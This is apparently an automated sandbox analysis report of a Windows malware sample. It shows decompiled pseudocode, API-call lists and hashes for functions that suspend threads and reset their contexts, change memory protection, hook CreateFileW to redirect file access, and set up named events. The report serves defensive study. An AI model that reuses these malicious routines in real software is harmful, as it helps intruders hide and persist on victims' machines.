                                                                                                        • Instruction Fuzzy Hash: 082127321092554BC3219B69CC807AF73EDAB84250F68062FE856C33D5E634E94587A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B570, Relevance: 3.0, APIs: 2, Instructions: 42nativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B570(long** __eax, intOrPtr _a4) {
				signed int _v0;
				void* __esi;
				long _t10;
				signed int _t16;
				void* _t21;
				intOrPtr* _t23;
				void* _t24;

				_t23 = __eax;
				 *__eax = 0;
				__eax[1] = 0;
				__eax[2] = 0;
				_t10 = E7098B420(__eax);
				if( *_t23 != 0) {
					_t16 = 0;
					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
						L7:
						return _t10;
					}
					do {
						_t10 = E7098B1A0(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
						_t21 = _t10;
						_t24 = _t24 + 0xc;
						if(_t21 != 0) {
							NtSuspendThread(_t21, 0); // executed
							E7098B340(_v0, _t21, _a4);
							_t24 = _t24 + 8;
							_t10 = NtClose(_t21);
						}
						_t16 = _t16 + 1;
					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
					goto L7;
				}
				return _t10;
			}










                                                                                                        0x7098b571
                                                                                                        0x7098b573
                                                                                                        0x7098b579
                                                                                                        0x7098b580
                                                                                                        0x7098b587
                                                                                                        0x7098b58f
                                                                                                        0x7098b592
                                                                                                        0x7098b597
                                                                                                        0x7098b5df
                                                                                                        0x00000000
                                                                                                        0x7098b5df
                                                                                                        0x7098b5a0
                                                                                                        0x7098b5aa
                                                                                                        0x7098b5af
                                                                                                        0x7098b5b1
                                                                                                        0x7098b5b6
                                                                                                        0x7098b5bb
                                                                                                        0x7098b5ca
                                                                                                        0x7098b5cf
                                                                                                        0x7098b5d3
                                                                                                        0x7098b5d3
                                                                                                        0x7098b5d8
                                                                                                        0x7098b5d9
                                                                                                        0x00000000
                                                                                                        0x7098b5de
                                                                                                        0x7098b5e1

                                                                                                        APIs
                                                                                                          • Part of subcall function 7098B420: NtQuerySystemInformation.NTDLL ref: 7098B435
                                                                                                          • Part of subcall function 7098B420: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,74B04970,74B05520,00000000), ref: 7098B45B
                                                                                                          • Part of subcall function 7098B420: NtQuerySystemInformation.NTDLL(00000005,00000000,?,?), ref: 7098B47C
                                                                                                          • Part of subcall function 7098B420: GetCurrentProcessId.KERNEL32(?,00000000), ref: 7098B498
                                                                                                          • Part of subcall function 7098B420: GetCurrentThreadId.KERNEL32 ref: 7098B4C6
                                                                                                          • Part of subcall function 7098B420: HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 7098B4EA
                                                                                                          • Part of subcall function 7098B420: VirtualFree.KERNEL32(00000000,00000005,00008000,00000005,00000000,?,?), ref: 7098B55B
                                                                                                          • Part of subcall function 7098B1A0: NtOpenThread.NTDLL ref: 7098B1F2
                                                                                                        • NtSuspendThread.NTDLL ref: 7098B5BB
                                                                                                          • Part of subcall function 7098B340: NtGetContextThread.NTDLL ref: 7098B366
                                                                                                          • Part of subcall function 7098B340: NtSetContextThread.NTDLL(?,00010001), ref: 7098B3FD
                                                                                                        • NtClose.NTDLL(00000000), ref: 7098B5D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1213046356-0
                                                                                                        • Opcode ID: 8aebaad441f0e4013d7a167b79df0d2a2c825a8757e2b9633e04c531b0e62b52
                                                                                                        • Instruction ID: 4894dc8b234bd52cd0d095f4bb0335948e0a8607d160be0feb6c9d4c6a04d706
                                                                                                        • Opcode Fuzzy Hash: 8aebaad441f0e4013d7a167b79df0d2a2c825a8757e2b9633e04c531b0e62b52
                                                                                                        • Instruction Fuzzy Hash: A60169755002059FD3209E24D8C2B2E73E8AB85B08F28452CF986577E5D7747845CA62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B890, Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B890() {
				void* __edi;
				void* _t6;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t17;

				E7098B7E0();
				_t17 =  *0x7098f6d4; // 0x0
				if(_t17 == 0) {
					_t14 = 2;
					goto L4;
				} else {
					_t14 = E7098B720(0, 0);
					if(_t14 != 0) {
						L4:
						E7098B830();
						return _t14;
					} else {
						E7098A8D0();
						_t6 =  *0x7098f6e0; // 0x0
						_t11 =  *0x7098f6d4; // 0x0
						HeapFree(_t11, 0, _t6);
						_t12 =  *0x7098f6d4; // 0x0
						HeapDestroy(_t12); // executed
						 *0x7098f6d4 = 0;
						 *0x7098f6e0 = 0;
						 *0x7098f6e4 = 0;
						 *0x7098f6e8 = 0;
						E7098B830();
						return _t14;
					}
				}
			}









                                                                                                        0x7098b892
                                                                                                        0x7098b899
                                                                                                        0x7098b89f
                                                                                                        0x7098b8f8
                                                                                                        0x00000000
                                                                                                        0x7098b8a1
                                                                                                        0x7098b8a7
                                                                                                        0x7098b8ae
                                                                                                        0x7098b8fd
                                                                                                        0x7098b8fd
                                                                                                        0x7098b906
                                                                                                        0x7098b8b0
                                                                                                        0x7098b8b0
                                                                                                        0x7098b8b5
                                                                                                        0x7098b8ba
                                                                                                        0x7098b8c3
                                                                                                        0x7098b8c9
                                                                                                        0x7098b8d0
                                                                                                        0x7098b8d6
                                                                                                        0x7098b8dc
                                                                                                        0x7098b8e2
                                                                                                        0x7098b8e8
                                                                                                        0x7098b8ee
                                                                                                        0x7098b8f7
                                                                                                        0x7098b8f7
                                                                                                        0x7098b8ae

                                                                                                        APIs
                                                                                                          • Part of subcall function 7098B7E0: InterlockedCompareExchange.KERNEL32(7098F6D0,00000001,00000000), ref: 7098B7F2
                                                                                                          • Part of subcall function 7098B7E0: Sleep.KERNEL32(00000001,00000000), ref: 7098B80B
                                                                                                          • Part of subcall function 7098B7E0: InterlockedCompareExchange.KERNEL32(7098F6D0,00000001,00000000), ref: 7098B817
                                                                                                          • Part of subcall function 7098A8D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,7098B8B5), ref: 7098A8FA
                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 7098B8C3
                                                                                                        • HeapDestroy.KERNELBASE(00000000), ref: 7098B8D0
                                                                                                          • Part of subcall function 7098B830: InterlockedExchange.KERNEL32(7098F6D0,00000000), ref: 7098B837
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ExchangeInterlocked$CompareFreeHeap$DestroySleepVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 722554433-0
                                                                                                        • Opcode ID: 50fcc0cd9409c0be78f0c530e016404ae0448266aa977b162a784e6276d98332
                                                                                                        • Instruction ID: 0f4bbd97d79db1eec4f565b54b529ccff8547879a77f3987993dfb79afde3c22
                                                                                                        • Opcode Fuzzy Hash: 50fcc0cd9409c0be78f0c530e016404ae0448266aa977b162a784e6276d98332
                                                                                                        • Instruction Fuzzy Hash: 4CF06D735282189FC201AB6BAC55B6EB6ACAFF0650734123BE401837F0F6359C42A792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B0B9, Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E7098B0B9(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				void* _t71;
				long _t97;

				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
				 *__ebx =  *__ebx + _t71;
				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
				_push(__ecx);
				_v4 = _a4;
				_a4 = _a8;
				_t97 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t97 > 0x00000000;
			}






                                                                                                        0x7098b12b
                                                                                                        0x7098b12d
                                                                                                        0x7098b13f
                                                                                                        0x7098b15f
                                                                                                        0x7098b160
                                                                                                        0x7098b16e
                                                                                                        0x7098b177
                                                                                                        0x7098b187
                                                                                                        0x7098b196

                                                                                                        APIs
                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,7098B7AC,00000000,00000000,00000000), ref: 7098B187
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2706961497-0
                                                                                                        • Opcode ID: 95bc77adfee839cf5924cbde05406c824cffcef9ee512e61c2a59762090e386e
                                                                                                        • Instruction ID: 9557c554dadcf7b18ff400f517293005c0bb1bc58cdc5c7849fd592d13a7d5a2
                                                                                                        • Opcode Fuzzy Hash: 95bc77adfee839cf5924cbde05406c824cffcef9ee512e61c2a59762090e386e
                                                                                                        • Instruction Fuzzy Hash: E4F0FE761083519FC705CF58CC92A5A77F4AF8A710B148A5DF1A5C7684D730E414DB63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B160, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B160(long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				long _t13;

				_v4 = _a4;
				_a4 = _a8;
				_t13 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t13 > 0x00000000;
			}





                                                                                                        0x7098b16e
                                                                                                        0x7098b177
                                                                                                        0x7098b187
                                                                                                        0x7098b196

                                                                                                        APIs
                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,7098B7AC,00000000,00000000,00000000), ref: 7098B187
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2706961497-0
                                                                                                        • Opcode ID: 0041ddc6d5f5d157e550f5aa2c735b6139568f4b9831ecdf922743d275e1f657
                                                                                                        • Instruction ID: f4834655d3d0964c12883c6d5de53fad74d136eb9e86c084fbf88593bcfe08c6
                                                                                                        • Opcode Fuzzy Hash: 0041ddc6d5f5d157e550f5aa2c735b6139568f4b9831ecdf922743d275e1f657
                                                                                                        • Instruction Fuzzy Hash: 7FE092B62083026F8348CF58D851D5BB3E4ABC8620F148A1DB1A5C3690D730D8048B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70987E20, Relevance: 65.0, APIs: 35, Strings: 2, Instructions: 257sleepstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 65%
                                                                                                        			E70987E20(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _v0;
				struct _SECURITY_ATTRIBUTES* _v4;
				char _v1044;
				short _v1052;
				char _v1304;
				char _v1308;
				char _v1312;
				char _v1316;
				char _v1320;
				char* _t28;
				CHAR* _t30;
				void* _t43;
				CHAR* _t44;
				CHAR* _t50;
				WCHAR* _t57;
				intOrPtr _t58;
				char _t64;
				intOrPtr _t67;
				void* _t68;
				void* _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t81;
				intOrPtr _t87;
				CHAR* _t90;
				intOrPtr _t95;
				intOrPtr _t100;
				CHAR* _t101;
				void* _t104;
				void* _t106;
				CHAR* _t109;
				char* _t110;
				intOrPtr _t129;

				_t110 =  &_v1308;
				_t109 = _a12;
				if(_t109 == 0) {
					L21:
					return  *0x7098f644(_a4, _a8, _t109);
				} else {
					_t28 =  *0x7098f620; // 0x783f38
					if(StrCmpNIA(_t109, _t28, 0xa) == 0) {
						L4:
						_t30 =  *0x7098f62c; // 0x784250
						if(lstrcmpiA(_t109, _t30) == 0) {
							if( *0x7098f5c4 > 0) {
								do {
									Sleep(0x3e8);
									_t73 =  *0x7098f5c4; // 0x0
									_t74 = _t73 - 1;
									 *0x7098f5c4 = _t74;
								} while (_t74 > 0);
							}
							if( *0x7098f568 != 0) {
								_t87 =  *0x7098f5e0; // 0xb52c80
								_push(_t87);
								wsprintfW( &_v1052, StrChrW(0x7098ca80, 0x22));
								_t67 =  *0x7098f5cc; // 0xb757b8
								_push(_t67);
								_push( &_v1044);
								_t68 = E70982AC0();
								_t110 =  &(_t110[0x14]);
								if(_t68 != 0) {
									_t106 = 0;
									while(1) {
										_t100 =  *0x7098f5f4; // 0x1
										_push(_t100);
										_push(0x45);
										_push(_t109);
										wsprintfA( &_v1312, StrChrA(0x7098cde8, 0x25));
										_t110 =  &(_t110[0x14]);
										_t72 = OpenEventA(2, 0,  &_v1304);
										if(_t72 != 0) {
											break;
										}
										Sleep(0x3e8); // executed
										_t106 = _t106 + 1;
										if(_t106 < 0xa) {
											continue;
										}
										goto L13;
									}
									_push(_t72); // executed
									L20:
									FindCloseChangeNotification(); // executed
									ExitProcess(0); // executed
								}
							}
							L13:
							_v1316 = 0;
							while(1) {
								_t129 =  *0x7098f5f4; // 0x1
								_push(0 | _t129 == 0x00000000);
								_push(0x45);
								_push(_t109);
								wsprintfA( &_v1316, StrChrA(0x7098cde8, 0x25));
								_t110 =  &(_t110[0x14]);
								_t104 = OpenEventA(2, 0,  &_v1308);
								if(_t104 == 0) {
									break;
								}
								_push(_t104);
								if( *0x7098f5f4 == 0) {
									goto L20;
								}
								SetEvent();
								CloseHandle(_t104);
								Sleep(0x3e8);
								_t64 = _v1312 + 1;
								_v1312 = _t64;
								if(_t64 < 0x3c) {
									continue;
								}
								break;
							}
							_push(0xc);
							_push(0x7098f51c);
							L7098BF02();
							_t95 =  *0x7098f5f4; // 0x1
							_push(_t95);
							_push(0x45);
							_push(_t109);
							wsprintfA( &_v1320, StrChrA(0x7098cde8, 0x25));
							_t43 = CreateEventA(_v4, 1, 0,  &_v1312);
							_push(0x4b);
							 *0x7098f51c = _t43;
							_t44 =  *0x7098f62c; // 0x784250
							_push(_t44);
							_push(StrChrA(0x7098ca94, 0x47));
							wsprintfA( &_v1320, StrChrA(0x7098ca8c, 0x25));
							 *0x7098f520 = CreateEventA(0, 1, 0,  &_v1312);
							E70982200(_t48, 6);
							_t50 =  *0x7098f62c; // 0x784250
							_push(0x52);
							_push(_t50);
							_push(StrChrA(0x7098ca94, 0x47));
							wsprintfA( &_v1320, StrChrA(0x7098ca8c, 0x25));
							 *0x7098f524 = CreateEventA(0, 1, 0,  &_v1312);
							E70982200(_t54, 6);
							 *0x7098f5c0 = CreateThread(0, 0, E709855D0, 0, 0, 0);
							_t57 = StrChrW(0x7098c464, 0x2e);
							_t58 =  *0x7098f5cc; // 0xb757b8
							E70982EF0(_t58, _t57);
							_t110 =  &(_t110[0x54]);
						}
						_t81 =  *0x7098f5f4; // 0x1
						wsprintfA( &_v1316, StrChrA(0x7098cde8, 0x25));
						return  *0x7098f644(_v0, _a4,  &_v1308, _t109, 0x48, _t81);
					} else {
						_t90 =  *0x7098f624; // 0x784294
						if(lstrcmpiA(_t109, _t90) == 0) {
							goto L4;
						} else {
							_t101 =  *0x7098f628; // 0x798f80
							if(lstrcmpiA(_t109, _t101) != 0) {
								goto L21;
							} else {
								goto L4;
							}
						}
					}
				}
			}




































                                                                                                        0x70987e20
                                                                                                        0x70987e27
                                                                                                        0x70987e31
                                                                                                        0x70988119
                                                                                                        0x70988138
                                                                                                        0x70987e37
                                                                                                        0x70987e37
                                                                                                        0x70987e4e
                                                                                                        0x70987e70
                                                                                                        0x70987e70
                                                                                                        0x70987e89
                                                                                                        0x70987e96
                                                                                                        0x70987ea0
                                                                                                        0x70987ea5
                                                                                                        0x70987eab
                                                                                                        0x70987eb0
                                                                                                        0x70987eb1
                                                                                                        0x70987eb6
                                                                                                        0x70987ea0
                                                                                                        0x70987ec1
                                                                                                        0x70987ec7
                                                                                                        0x70987ecd
                                                                                                        0x70987ee4
                                                                                                        0x70987eea
                                                                                                        0x70987eef
                                                                                                        0x70987ef7
                                                                                                        0x70987ef8
                                                                                                        0x70987efd
                                                                                                        0x70987f02
                                                                                                        0x70987f04
                                                                                                        0x70987f06
                                                                                                        0x70987f06
                                                                                                        0x70987f0c
                                                                                                        0x70987f0d
                                                                                                        0x70987f0f
                                                                                                        0x70987f1f
                                                                                                        0x70987f21
                                                                                                        0x70987f2d
                                                                                                        0x70987f35
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f40
                                                                                                        0x70987f46
                                                                                                        0x70987f4a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f4a
                                                                                                        0x7098810a
                                                                                                        0x7098810b
                                                                                                        0x7098810b
                                                                                                        0x70988113
                                                                                                        0x70988113
                                                                                                        0x70987f02
                                                                                                        0x70987f4c
                                                                                                        0x70987f4c
                                                                                                        0x70987f54
                                                                                                        0x70987f56
                                                                                                        0x70987f5f
                                                                                                        0x70987f60
                                                                                                        0x70987f62
                                                                                                        0x70987f72
                                                                                                        0x70987f74
                                                                                                        0x70987f86
                                                                                                        0x70987f8a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f93
                                                                                                        0x70987f94
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987f9a
                                                                                                        0x70987fa1
                                                                                                        0x70987fac
                                                                                                        0x70987fb6
                                                                                                        0x70987fb7
                                                                                                        0x70987fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987fbe
                                                                                                        0x70987fc0
                                                                                                        0x70987fc2
                                                                                                        0x70987fc7
                                                                                                        0x70987fcc
                                                                                                        0x70987fd2
                                                                                                        0x70987fd3
                                                                                                        0x70987fd5
                                                                                                        0x70987fe5
                                                                                                        0x70988001
                                                                                                        0x70988003
                                                                                                        0x70988005
                                                                                                        0x7098800a
                                                                                                        0x7098800f
                                                                                                        0x70988019
                                                                                                        0x70988029
                                                                                                        0x7098803e
                                                                                                        0x70988043
                                                                                                        0x70988048
                                                                                                        0x70988050
                                                                                                        0x70988052
                                                                                                        0x7098805c
                                                                                                        0x7098806c
                                                                                                        0x70988081
                                                                                                        0x70988086
                                                                                                        0x709880aa
                                                                                                        0x709880af
                                                                                                        0x709880b6
                                                                                                        0x709880bc
                                                                                                        0x709880c1
                                                                                                        0x709880c1
                                                                                                        0x709880c4
                                                                                                        0x709880dd
                                                                                                        0x70988107
                                                                                                        0x70987e50
                                                                                                        0x70987e50
                                                                                                        0x70987e5c
                                                                                                        0x00000000
                                                                                                        0x70987e5e
                                                                                                        0x70987e5e
                                                                                                        0x70987e6a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987e6a
                                                                                                        0x70987e5c
                                                                                                        0x70987e4e

                                                                                                        APIs
                                                                                                        • StrCmpNIA.SHLWAPI(?,00783F38,0000000A), ref: 70987E40
                                                                                                        • lstrcmpiA.KERNEL32(?,00784294), ref: 70987E58
                                                                                                        • lstrcmpiA.KERNEL32(?,00798F80), ref: 70987E66
                                                                                                        • lstrcmpiA.KERNEL32(?,00784250), ref: 70987E79
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70987EA5
                                                                                                        • StrChrW.SHLWAPI(7098CA80,00000022,00B52C80), ref: 70987ED5
                                                                                                        • wsprintfW.USER32 ref: 70987EE4
                                                                                                        • StrChrA.SHLWAPI(7098CDE8,00000025,?,00000045,00000001), ref: 70987F17
                                                                                                        • wsprintfA.USER32 ref: 70987F1F
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 70987F2D
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70987F40
                                                                                                        • StrChrA.SHLWAPI(7098CDE8,00000025,?,00000045,00000000), ref: 70987F6A
                                                                                                        • wsprintfA.USER32 ref: 70987F72
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 70987F80
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 70987F9A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70987FA1
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 70987FAC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: EventSleeplstrcmpiwsprintf$Open$CloseHandle
                                                                                                        • String ID: 8?x$PBx
                                                                                                        • API String ID: 3435451381-3843287149
                                                                                                        • Opcode ID: 16b62f38651fecf5ddaf7314c73bff49485a984abf5871d992950396390ce3ee
                                                                                                        • Instruction ID: bfc347122cb35cc7494e7dd34fdbaf52186b99df179771dd9f3eabd6a6f61d00
                                                                                                        • Opcode Fuzzy Hash: 16b62f38651fecf5ddaf7314c73bff49485a984abf5871d992950396390ce3ee
                                                                                                        • Instruction Fuzzy Hash: 808186B2658304AFE210DB66CC4DF6F77ACEB98B05F104529F606D63D1EB70E9049B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70988210, Relevance: 19.6, APIs: 13, Instructions: 132filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E70988210(signed int __eax, WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
				char _v0;
				short _v532;
				short _v540;
				signed int _t19;
				void* _t22;
				WCHAR* _t24;
				WCHAR* _t27;
				WCHAR* _t34;
				intOrPtr _t45;
				intOrPtr _t46;
				WCHAR* _t50;
				WCHAR* _t53;
				intOrPtr _t55;
				WCHAR* _t58;
				WCHAR* _t62;
				void* _t63;

				_t19 = __eax;
				_t62 = _a4;
				if(_t62 == 0) {
					L10:
					_t22 = CreateFileW(_t62, _a8, _a12, _a16, _a20, _a24, _a28); // executed
					return _t22;
				} else {
					if(_v0 != 0x3a) {
						_t58 = PathFindFileNameW(_t62);
						_t24 =  *0x7098f5d8; // 0xb7c4e8
						if(lstrcmpiW(_t62, _t24) == 0) {
							_pop(_t58);
							_pop(_t62);
							_t63 = _t63 + 0x20c;
							_t50 =  *0x7098f5e4; // 0xb52c80
							_a4 = _t50;
							goto ( *0x7098f654);
						}
						_t53 =  *0x7098f61c; // 0x77af54
						_t19 = lstrcmpiW(_t58, _t53);
						if(_t19 == 0) {
							goto L2;
						} else {
							_t27 =  *0x7098f604; // 0x749734
							_t19 = StrCmpNIW(_t62, _t27, 0xb);
							if(_t19 == 0) {
								goto L2;
							} else {
								if(lstrcmpiW(_t58, StrChrW(0x7098cdfc, 0x74)) != 0) {
									goto L10;
								} else {
									_t45 =  *0x7098f5cc; // 0xb757b8
									_push(_t58);
									_push(_t45);
									wsprintfW( &_v540, StrChrW(0x7098c658, 0x25));
									if(lstrcmpiW( &_v532, _t62) != 0) {
										goto L10;
									} else {
										_t34 = StrChrW(0x7098cdf0, 0x2e);
										_t46 =  *0x7098f600; // 0x749736
										_t55 =  *0x7098f5cc; // 0xb757b8
										wsprintfW( &_v540, StrChrW(0x7098ca08, 0x25));
										return  *0x7098f654( &_v532, _v0, _a4, _a8, _a12, _a16, _a20, _t55, _t46, _t34);
									}
								}
							}
						}
					} else {
						L2:
						return _t19 | 0xffffffff;
					}
				}
			}



















                                                                                                        0x70988210
                                                                                                        0x70988218
                                                                                                        0x70988223
                                                                                                        0x70988354
                                                                                                        0x70988385
                                                                                                        0x70988395
                                                                                                        0x70988229
                                                                                                        0x7098822e
                                                                                                        0x7098824d
                                                                                                        0x7098824f
                                                                                                        0x7098825a
                                                                                                        0x7098825c
                                                                                                        0x7098825e
                                                                                                        0x70988260
                                                                                                        0x70988266
                                                                                                        0x7098826c
                                                                                                        0x70988270
                                                                                                        0x70988270
                                                                                                        0x70988276
                                                                                                        0x7098827e
                                                                                                        0x70988282
                                                                                                        0x00000000
                                                                                                        0x70988284
                                                                                                        0x70988284
                                                                                                        0x7098828d
                                                                                                        0x70988295
                                                                                                        0x00000000
                                                                                                        0x70988297
                                                                                                        0x709882ac
                                                                                                        0x00000000
                                                                                                        0x709882b2
                                                                                                        0x709882b2
                                                                                                        0x709882b8
                                                                                                        0x709882b9
                                                                                                        0x709882cf
                                                                                                        0x709882de
                                                                                                        0x00000000
                                                                                                        0x709882e0
                                                                                                        0x709882e7
                                                                                                        0x709882e9
                                                                                                        0x709882ef
                                                                                                        0x70988307
                                                                                                        0x70988351
                                                                                                        0x70988351
                                                                                                        0x709882de
                                                                                                        0x709882ac
                                                                                                        0x70988295
                                                                                                        0x70988233
                                                                                                        0x70988233
                                                                                                        0x7098823d
                                                                                                        0x7098823d
                                                                                                        0x7098822e

                                                                                                        APIs
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 70988241
                                                                                                        • lstrcmpiW.KERNEL32(?,00B7C4E8), ref: 70988256
                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 70988385
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateFindNamePathlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 3438131021-0
                                                                                                        • Opcode ID: 8c87acb731ddd61b31dad663b6a96822009f1d73b14ea108c15dce2b40d40ad2
                                                                                                        • Instruction ID: b21e3bcbceb805d9c86d392a9602a85287e908dfac03dbadcfee4f480ee88fb0
                                                                                                        • Opcode Fuzzy Hash: 8c87acb731ddd61b31dad663b6a96822009f1d73b14ea108c15dce2b40d40ad2
